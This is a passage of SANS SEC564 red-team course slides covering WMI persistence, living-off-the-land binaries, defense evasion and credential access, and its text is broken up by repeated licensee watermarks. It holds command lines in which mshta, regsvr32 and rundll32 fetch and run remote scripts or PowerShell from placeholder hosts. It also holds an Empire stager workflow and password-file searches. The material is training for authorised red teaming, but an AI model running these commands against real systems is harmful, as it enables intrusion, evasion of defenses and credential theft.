[email protected] SEC564 | Red Team Exercises and Adversary Emulation

55

ak

er

@ ya

ho

22829180

Lincoln Mazzei ze

An Event Consumer: An action to perform upon triggering an event of interest An Event Filter: The event of interest A Filter to Consumer Binding: The registration mechanism that binds a filter to a consumer

az

• • •

i< an

nm

WMI Persistence A subscription is the term used for WMI persistence, and it consists of the following three items:

nc o

ln

M

The possibilities with WMI subscriptions are endless, as an EventFilter can trigger on about everything resulting in something else being executed by the EventConsumer. WMI Event Filter A WMI filter consists of a query that is checked against the WMI data on the target machine; the answer is always true or false. WMI Filter is a mandatory class entry creation process to activate event consumer class instances. Event filters are triggers or autostart methods to execute event consumer entries.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

WMI Event Consumers A WMI consumer is a management application or script that interacts with the WMI infrastructure. Such an application can query data, enumerate data, run provider methods, or subscribe to events by calling either the COM API for WMI or the Scripting API for WMI. EventConsumers are able execute a program or code following the trigger of the WMI EventFilter.

live

WMI EventFilterToConsumer binding This class instance associates an EventFilter instance with an EventConsumer instance. It completes the cycle by relating the class instances with each other. It answers the question, “What Windows event (EventFilter) will I execute my script program (EventConsumer) with?” References: Windows Management Instrumentation Event Subscription: https://attack.mitre.org/techniques/T1084/ Source of image: https://github.com/pan-unit42 © 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

55

© SANS Institute 2020 L a b 2 . 2 : D i s c o v e r y, P r i v i l e g e E s c a l a t i o n , a n d Pe r s i s t e n c e

Course Roadmap

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

56

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

56

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Click2.2 To| Edit MasterPrivilege Title Style Lab Discovery, Escalation, and Persistence

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 2.2 | Discovery, Privilege Escalation, and Persistence

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

57

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

57

© SANS Institute 2020 Course Roadmap

Defense Evasion and Execution

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

58

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

58

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0005

Defense Evasion and Execution

TM

090aff33bcb6e401ded410120bc9a268 Evading detection and other Blue Team controls 26 ,2 02 0

• Red Team is up against mostly mature organizations – Anti-Exploit (next-gen Antivirus) – Application Whitelisting – Endpoint Detection and Response (EDR) – Hunt Teams

Ap ril

[email protected] o.

co

m

>

• Red Team does not want to get caught, yet • Defense evasion supports other tactics SEC564 | Red Team Exercises and Adversary Emulation

59

ak

er

@ ya

ho

22829180 i< an

nm

Defense Evasion and Execution Defense evasion is a tactic with multiple techniques to evade detection or avoid controls. Sometimes, these actions are the same as or variations of techniques in other ATT&CK categories that have the added benefit of bypassing a particular control, and this is why we have bundled it with Execution. The execution tactic represents techniques that result in execution of Red Team payloads.

az

ze

Lincoln Mazzei

Anti-Exploit (next-gen antivirus) Application Whitelisting Endpoint Detection and Response (EDR) Hunt Teams

nc o

• • • •

ln

M

Red Team is up against mostly mature organizations and they do not want to get caught until objectives are met. Mature organizations have employed a number of defensive controls that Red Team will have to evade:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References: https://attack.mitre.org/tactics/TA0002/ https://attack.mitre.org/tactics/TA0005/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

59

© SANS Institute 2020 LOLBAS

090aff33bcb6e401ded410120bc9a268 Living Off The Land Binaries and Scripts 26 ,2 02 0

A LOLBin/Lib/Script must: • Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft • Have extra "unexpected" functionality

Ap ril

[email protected] m co

o.

• Have functionality that would be useful to an APT or Red Team

>

– Exceptions are application whitelisting bypasses

SEC564 | Red Team Exercises and Adversary Emulation

60

ak

er

@ ya

ho

22829180 i< an

nm

LOLBAS The phrase "Living off the land" was coined by Christopher Campbell (@obscuresec) and Matt Graeber (@mattifestation) at DerbyCon 3 and means to use Microsoft-signed binaries, scripts, and libraries for defense evasion. LOLBAS is the name of the current project with the goal to document every binary, script, and library that can be used for Living Off The Land techniques.

ze

Lincoln Mazzei



M

ln

Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft Have extra "unexpected" functionality • Exceptions are application whitelisting bypasses Have functionality that would be useful to an APT or Red Team

nc o

• •

az

Criteria for a LOLBin/Lib/Script:

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Executing code • Arbitrary code execution • Pass-through execution of other programs (unsigned) or scripts (via a LOLBin) Compiling code File operations (Download/Upload/Copy) Persistence UAC bypass Credential theft Dumping process memory Surveillance (e.g. keylogger, network trace) Log evasion/modification DLL side-loading/hijacking without being relocated elsewhere in the filesystem

Li

• • • • • • • • •

ce

ns



ed

Functionality can include:

live

References: https://github.com/LOLBAS-Project/LOLBAS https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-applicationcontrol/microsoft-recommended-block-rules

60

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 LOLBAS Examples

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

61

ak

er

@ ya

ho

22829180 i< an

nm

LOLBAS Examples These are a couple of screenshots from the LOLBAS Project page. The main page allows you to search among various different binaries, scripts, and libraries. It shows the Binary name, the functions it has, and the type it is. You can then click on one to go to the page with more information about the particular binary, script, or library. On the right-hand side of the slide is the page for Regsvr32.exe which we will cover next.

az

ze

Lincoln Mazzei nc o

ln

M

Reference: https://lolbas-project.github.io/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

61

© SANS Institute 2020 ATT&CK T1170

HTA File

TM

090aff33bcb6e401ded410120bc9a268 HTML Application (HTA) files are executed by mshta.exe 26 ,2 02 0

• Payloads can be VBScript, JavaScript, PowerShell • Delivered as an attachment or hosted on web server • LOLBIN executed as current user

o.

co

m

>

Ap ril

[email protected]

C:\ mshta.exe payload.hta

SEC564 | Red Team Exercises and Adversary Emulation

62

ak

er

@ ya

ho

22829180 i< an

nm

HTA File HTA files have been widely used by Red Team and adversaries for defense evasion in the recent years. An HTA file is an HTML Application file and is executed by mshta.exe (a LOLBIN). The HTA file can be sent in an email as an attachment or hosted on a web server and accessed via a clicked link. By default, Windows will run the file that can be a payload in VBScipt, JavaScript, or PowerShell.

M

nc o

ln

File Location: C:\Windows\System32\mshta.exe C:\Windows\SysWOW64\mshta.exe

az

ze

Lincoln Mazzei

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. C:\ mshta.exe payload.hta

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

Executes VBScript supplied as a command line argument. C:\ mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

Li

ce

Executes JavaScript supplied as a command line argument. C:\ mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBASProject/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();

live

References: https://attack.mitre.org/techniques/T1170/ https://lolbas-project.github.io/lolbas/Binaries/Mshta/

62

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1027

Demiguise – HTA Encryption Tool

TM

090aff33bcb6e401ded410120bc9a268 Many adversaries leverage HTA and Blue Team may detect 26 ,2 02 0

NCC Group released Demiguise, an HTA encryption tool Generates an HTML file with encrypted HTA (using RC4) Target visits page, fetches key, and HTA is decrypted File-type will show text/html instead of HTA

Ap ril

[email protected] >

• • • •

o.

co

m

python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

SEC564 | Red Team Exercises and Adversary Emulation

63

ak

er

@ ya

ho

22829180 i< an

nm

Demiguise Due to HTA popularity by adversaries, many Blue Teams have implemented preventive and detective controls against it. Richard Warren from NCC Group created an HTA encryption tool to evade evasion. This is a defense evasion technique listed in ATT&CK as Obfuscated Files or Information (T1027). The aim of Demiguise is to generate .html files that contain an encrypted HTA file. When your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This is achieved by encrypting the HTA file using RC4, and then using navigator.msSaveBlob to "save" the file at runtime rather than fetching the HTA directly from the server. Meaning that at no point is there an HTTP request/response that contains your HTA file in a plain-text form; the proxy will simply see a text/html file containing your encrypted blob.

nc o

ln

M

az

ze

Lincoln Mazzei

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

To use Demiguise, download the Python script and use the following flags: -k for the encryption key -p for the payload -l will list the payloads -c command to run from the HTA -o output of the HTA file Reference: https://attack.mitre.org/techniques/T1027/ https://github.com/nccgroup/demiguise

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

63

© SANS Institute 2020 ATT&CK T1117

Regsvr32

TM

090aff33bcb6e401ded410120bc9a268 Third most popular ATT&CK technique: Red Canary 26 ,2 02 0

• Regsvr32.exe is used by Windows to register DLLs • Discovered by Casey Smith • Bypasses Application whitelisting

[email protected] Ap ril

– Trusted by Microsoft

co

m

>

• Can pull files from network or Internet (proxy aware) via TLS • Executed in memory, does not touch disk

o.

C:\ regsvr32 /s /n /u /i:https://example.com/payload.sct scrobj.dll SEC564 | Red Team Exercises and Adversary Emulation

64

ak

er

@ ya

ho

22829180 i< an

nm

Regsvr32 Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed.

nc o

ln

M

File Location: C:\Windows\System32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

az

ze

Lincoln Mazzei

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

C:\ regsvr32 /s /n /u /i:https://example.com/file.sct scrobj.dll These options are instructing the regsrv32 to run:

ce

ns

ed

Silently without displaying any messages /s To not call the DLL Register Server /n To use another IP address since it will not call the DLL Register Server /i To use the unregister method /u

Li

• • • •

Third most popular ATT&CK technique according to Red Canary Regsvr32 offers a simple and elegant way for adversaries to execute native code or scripts, either by staging resources locally or by loading them from a remote location. Because the technique leverages a trusted component of the Windows platform that cannot be easily disabled or constrained and detection depends on close inspection of process-level telemetry, this technique remains effective and popular with everyone from purveyors of unwanted software to high-profile actors. In addition to evading detection by most protection products for well over a year,

live

64

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 this technique remains effective due to derivative attack vectors that allow for execution of VBScript and JScript via regsvr32. As a result, these scripts can be used to craft and execute payloads without calling the native wscript.exe and cscript.exe handlers, circumventing detection that relies on these processes and also bypassing Windows Script Host controls.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: Regsvr32: https://attack.mitre.org/techniques/T1117/ https://redcanary.com/blog/3-technique-regsvr32-t1117/ https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

65

© SANS Institute 2020 Empire SCT

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

66

ak

er

@ ya

ho

22829180 i< an

nm

Empire SCT This slide shows screenshots from an Empire SCT launcher file and the execution from a Windows host.

Lincoln Mazzei M

az

ze

To generate the file in Empire: (Empire: listeners) > usestager windows/launcher_sct (Empire: stager/windows/macro) > set Listener http (Empire: stager/windows/macro) > generate

nc o

ln

The cat command shows the file in the location Empire saves it to: /tmp/launcher.sct The file is then hosted on a web server: sudo python –m SimpleHTTPServer 443

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Then on the Windows system, it is executed: C:\ regsvr32 /s /n /u /i:http://10.0.0.105:443/laucher.sct scrobj.dll

live

66

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1085

Rundll32

TM

090aff33bcb6e401ded410120bc9a268 Used to launch DLL files 26 ,2 02 0

• Can be used to execute arbitrary payload • Can execute scripts • Can run Control Panel Item files (.cpl)

[email protected] Ap ril

– Control_RunDLL and Control_RunDLLAsUser

o.

co

m

>

C:\ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Ru n("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.com/’);” SEC564 | Red Team Exercises and Adversary Emulation

67

ak

er

@ ya

ho

22829180 i< an

nm

Rundll32 There is no way to directly run a DLL file and hence rundll32.exe is the Microsoft way of doing it. As you recall, DLLs are Dynamic Link Library files used by most applications. They store common pieces of application logic that can be accessed from multiple applications. Rundll32.exe is simply used to launch these functions from DLL files. Rundll32 is a LOLBIN as it comes as part of the Windows operating system and is required to function. Red Team can leverage rundll32.exe to run arbitrary payloads and execute scripts.

nc o

ln

M

File Location: C:\Windows\System32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

az

ze

Lincoln Mazzei

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

To :

Li

Examples Execute a JavaScript that runs a PowerShell script that is downloaded from a remote website: C:\ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.com/’);”

Li

Execute a JavaScript script that calls a remote JavaScript script: C:\ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/JavascriptBackdoor/master/test")

live

References: https://attack.mitre.org/techniques/T1085/ https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

67

© SANS Institute 2020 ATT&CK T1023

Shortcuts

TM

090aff33bcb6e401ded410120bc9a268 • Create new shortcut 26 ,2 02 0

• Edit an existing shortcut • Map the shortcut file to an arbitrary file with parameters • Payload can be:

[email protected] o.

co

m

>

Ap ril

– Rundll32 – Powershell – Regsvr32 – Executable on disk

SEC564 | Red Team Exercises and Adversary Emulation

68

ak

er

@ ya

ho

22829180 i< an

nm

Shortcuts Shortcuts or symbolic links are ways of referencing other files or applications that will be opened or executed when the shortcut is clicked by a user. Red Teams can use shortcuts to execute their own payloads for initial access or persistence. A new shortcut can be created or it can be edited to change the target path. This pertains to *nix systems as well and often called symbolic links.

az

ze

Lincoln Mazzei nc o

ln

M

The target or reference file of the shortcut can be modified to execute a number of the different execution and evasion bypass methods discussed. In the slide, you can see the rundll32.exe method. To make the shortcut more believable, change the icon and name. Reference: https://attack.mitre.org/techniques/T1023/

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

68

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1500

No PowerShell?

TM

090aff33bcb6e401ded410120bc9a268 What if the Blue Team can catch all your PowerShell? 26 ,2 02 0

• Red Canary’s 2019 Threat Detection Report listed PowerShell as the most used technique observed by adversaries • Blue Teams have noticed and added controls:

o.

co

m

>

Ap ril

[email protected]

– Antimalware Scan Interface (AMSI) – Constrained Language Mode – PowerShell v5 only (disable v2) – Centralized Logging with Full Transcript Mode

For every step forward in defense, offense seems to find a bypass! SEC564 | Red Team Exercises and Adversary Emulation

69

ak

er

@ ya

ho

22829180 i< an

nm

No PowerShell? Many organizations have realized that PowerShell is highly leveraged by adversaries and have implemented detective and preventive controls. Red Canary’s 2019 Threat Detection Report listed PowerShell as the most used technique observed! Therefore, to evade detection, Red Team may have to drop the use of PowerShell altogether. Due to this trend, C# is being used to implement functionality throughout the Unified Kill Chain.

az

ze

Lincoln Mazzei ln

Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to integrate with any antimalware product present on a machine. PowerShell has a built-in AMSI scanning module! PowerShell Constrained Language Mode aims to “deny” access to non-core PowerShell features (which are often abused in hacking tools / malicious scripts) PowerShell v5 comes in Windows 10 and Server 2016 with many new security features. Blue Teams go further to disable version 2 Centralized Logging with Full Transcript Mode: Monitoring and detecting PowerShell execution can be done via transcripts and Windows event logs (preferably using Script Block Logging)

nc o



M

Some PowerShell controls for detection and prevention:

To :

ed

Li

ce



ns



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Solution? Many Red Teams in the industry are just not using PowerShell anymore and building custom code, just like adversaries do, in C#. Writing your own code or compiling modified code takes your Red Team to the next level and allows Blue Team to focus on detecting attack patterns instead of tools. Malcom Vetter has an excellent series of posts on Medium with more on C# for Red Teaming.

live

References: https://redcanary.com/blog/getting-started-with-attck-new-report-suggests-prioritizing-powershell/ Compile After Delivery: https://attack.mitre.org/techniques/T1500/ https://medium.com/@malcomvetter

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

69

© SANS Institute 2020 C#

090aff33bcb6e401ded410120bc9a268 • Download Visual Studio • •

26 ,2 02 0

Community (free) Create .NET project Write code (or copy from GitHub or Empire) Compile Move executable to target system Execute without detection

> m co o.



Ap ril

[email protected]

• •

SEC564 | Red Team Exercises and Adversary Emulation

70

ak

er

@ ya

ho

22829180 ze

az

M

ln

• • •

Lincoln Mazzei

Download Visual Studio Community: Free from Microsoft website. Install on any Windows system Create .NET project: Select "Windows Forms App (.NET Framework)" template Write code (or copy from GitHub or Empire): Copy the code from GitHub or from Empire if using the usestager windows/csharp_exe Compile: Press F6 to compile. It is saved in projectname\bin\Debug\projectname.exe Move executable to target system: Move the executable to the target system via various means Execute without detection: Run it and wait for the callback

nc o

• • •

i< an

nm

C# Example Although creating your own C# code and compiling may sound difficult. It is quite simple.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

References: https://www.peew.pw/blog/2017/11/24/an-introduction-to-writing-net-executables-for-pentesters https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

live

70

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 GhostPack

090aff33bcb6e401ded410120bc9a268 C# Implementations of many techniques we covered 26 ,2 02 0

• GhostPack – Seatbelt – Host and network discovery – SharpUp – Privilege Escalation – SharpRoast – Kerberoasting – SharpDump – Dump memory of processes – SafetyKatz – Safe Mimikatz – SharpWMI – C# wrapper for WMI

co

m

>

Ap ril

[email protected] o.

• OffensiveCSharp by Matt Hand

SEC564 | Red Team Exercises and Adversary Emulation

71

ak

er

@ ya

ho

22829180

Lincoln Mazzei ln

M

az

ze

Seatbelt – host and network discovery SharpUp – Privilege Escalation SharpRoast – Kerberoasting SharpDump – dump memory of processes SafetyKatz – Safe Mimikatz SharpWMI – C# wrapper for WMI

nc o

• • • • • •

i< an

nm

GhostPack GhostPack, written by Will Schroeder, is a collection of various C# implementations of PowerShell functionality we have covered thus far. It includes six separate toolsets:

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

References: http://www.harmj0y.net/blog/redteaming/ghostpack/ https://github.com/GhostPack https://github.com/matterpreter/OffensiveCSharp

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

71

© SANS Institute 2020 ATT&CK T1480

Execution Guardrails

TM

090aff33bcb6e401ded410120bc9a268 Encrypting payload with local and remote resources so it will • Resources are *unique* environmental variables, specific computer name, specific username, or website response • Demiguise can do environmental keying • Ebowla by Josh Pitts and Travis Morrow • KeyRing by Leo Loobeek

26 ,2 02 0

only decrypt on the target system

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

72

ak

er

@ ya

ho

22829180 i< an

nm

Execution Guardrails Execution Guardrails or Keying is the process of encrypting your payload with local and remote resources so it will only decrypt on the target system. The resources are unique to the target system such as environmental variables, computer name, username, etc. The payload can only be decrypted with the key of these unique resources. This protects the Red Team payload by evading sandbox technology, endpoint security, and slowing down incident response.

az

ze

Lincoln Mazzei ln

M

The steps for creating a keyed payloads are:

nc o

1. Create functions to retrieve a key name (username, path for a program) 2. Loop through the key data and hash each possible key 3. Decrypt with each key hash

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

Remote resources give the Red Team even more control but will require payload to have outbound connectivity (e.g. HTTP to a webpage). If the remote resource is up, the payload executes. If it is not, then it does not execute. This is good for evading incident response.

Li

ce

Ebowla was one of the first implementations of keying written by Josh Pitts and Travis Morrow. While the GitHub page says it is no longer supported, it still works great. Ebowla can encrypt your DLLs, EXEs, shellcode, Python, and PowerShell. It can give you binaries created from Go, Python, or PowerShell.

live

KeyRing was developed to easily provide encryption/decryption code and other techniques for keying. The tool will output raw C#, JScript, or PowerShell that you can then build into your stage0/launcher payloads (e.g. MSBuild.exe). References: https://adapt-and-attack.com/2017/11/15/keying-payloads-for-scripting-languages/ https://github.com/Genetic-Malware/Ebowla https://github.com/leoloobeek/keyring Execution Guardrails: https://attack.mitre.org/techniques/T1480/ 72

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Defender Check

• Created by Matt Hand • Takes a binary as input • Splits it until it pinpoints that exact byte that Microsoft Defender will flag on • Prints those offending bytes to the screen • Very helpful when trying to identify the specific bad pieces of code in your tool/payload

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Uses PowerShell to test binaries against Windows Defender

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

73

ak

er

@ ya

ho

22829180 i< an

nm

Defender Check Matt Hand released a tool called Defender Check. This uses an older strategy of splitting binaries in half, running them through the target antivirus solution, and determining exactly what byets are being caught. Red Team then modifies those bytes to do the same functionality but not match a signature. Defender Check does the similar steps via a PowerShell script. It takes a binary as input and splits it until it pinpoints the exact bytes that Microsoft Defender will trigger on, and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your payload.

M

az

ze

Lincoln Mazzei nc o

ln

References: https://github.com/matterpreter/DefenderCheck

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

73

© SANS Institute 2020 Course Roadmap

Credential Access

090aff33bcb6e401ded410120bc9a268 Initial Access Lab 2.1: Delivery and Initial Access Network Propagation Discovery Privilege Escalation Persistence Lab 2.2: Discovery, Privilege Escalation, and Persistence Defense Evasion and Execution Credential Access Lateral Movement and Pivoting Lab 2.3: Defense Evasion, Credential Access, and Pivoting Action on Objectives Target Manipulation, Collection, and Exfiltration Lab 2.4: Action on Objectives Exercise Closure Analysis and Response Reporting Remediation and Action Plan Lab 2.5: Exercise Closure

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

74

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

74

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0006

Credential Access

TM

090aff33bcb6e401ded410120bc9a268 Passwords continue to be the primary authentication method • While internet applications may rely on multi-factor authentication

Cleartext files Typed by user Password Managers Enterprise Vaults Memory Active Directory Network Sniffing

26 ,2 02 0

• • • • • • •

>

m

co

o.

• Many internal applications still rely on single-factor authentication

Ap ril

[email protected]

– Something you know – Something you are – Something you have

SEC564 | Red Team Exercises and Adversary Emulation

75

ak

er

@ ya

ho

22829180 i< an

nm

Credential Access While the industry has done a good job pushing for multi-factor authentication on internet facing applications, many internal applications still rely on single-factor authentication: Passwords. A password, or something the person knows, is a single factor of authentication. Multi-factor authentication implies one of the three characteristics: Something you know, something you are, or something you have. Passwords may be stored in a variety of different areas such as:

M

ln



Cleartext files: End users may save passwords in cleartext files to remember the large amount of passwords they have Typed by user: If a user does remember their passwords, they often have to type it in via the input device (generally a keyboard) Memory: Windows systems store hashed and cleartext passwords in memory Password Managers: Many end users have turned to password managers to store credentials to the multitude of applications that should have different passwords Enterprise Vaults: Enterprises have also implemented enterprise vaults to store passwords for secondary or service accounts. This allows the user to obtain a one-time password for “Just In Time” (JIT) access Active Directory: AD is leveraged by many organizations as a Single Sign On solution. By definition, this requires the password or its representation to be stored. Network Sniffing: Authentication may happen across the network; looking at network packets may allow for credential access or other Man-in-the-Middle attacks

nc o



az

ze

Lincoln Mazzei



To :

ed

ns

ce



Li



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • •

live

Obtaining victim credentials, or credential access as MITRE™ calls the tactic, is key for most Red Team engagements and leveraged heavily by adversaries. This is because having a user password allows the Red Team to blend in and authenticate without creating failed logins or leveraging other TTPs that may be caught by Blue Team. Reference: https://attack.mitre.org/tactics/TA0006/

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

75

© SANS Institute 2020 ATT&CK T1081

Cleartext Files

TM

– TXT Files – Word – Excel – OneNote – Configuration Files – Unattended Install Files

• Bash History • Private Keys – SSH – PGP

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • Files • Registry Ap ril

[email protected] • Password representations co

m

>

– SAM Database – /etc/shadow

o.

PS C:\> select-string -path c:\users\*.txt -pattern password SEC564 | Red Team Exercises and Adversary Emulation

76

ak

er

@ ya

ho

22829180 i< an

nm

Cleartext Files End users store passwords in a variety of cleartext formats to store them easier. While this is arguably better than having the same password for every site, it has obvious security implications. Red Team can search the file system for files with password in the name or in the content itself via a variety of ways. To search for the word password in TXT files within the C:\Users directory: PS C:\> select-string -path c:\users\*.txt pattern password

az

ze

Lincoln Mazzei nc o

ln

M

The Windows Registry stores configuration information that can be used by the system or other programs. Red Team can query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Cached credentials may be found in the registry for cracking offline. Bash keeps track of the command's users type on the command-line with the "history" inside the .bash_history file. The file resides in: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out.

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

Private keys for SSH or PGP are often stored locally in the user’s home folder. These are useful for lateral movement as well. Password representations can be obtained in Linux and UNIX in the /etc/passwd and /etc/shadow files. Note that /etc/shadow is only readable by root. In Windows, the SAM database stored by default on some Windows machines in c:\windows\repair or c:\winnt\repair contains password representations of local users. These can be used to crack offline or to perform pass-the-hash to other Windows systems.

live

References: Bash History: https://attack.mitre.org/techniques/T1139 Credentials in Files: https://attack.mitre.org/techniques/T1081 Credentials in Registry: https://attack.mitre.org/techniques/T1214 Private Keys: https://attack.mitre.org/techniques/T1145

76

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1081

Unattended Install Files

TM

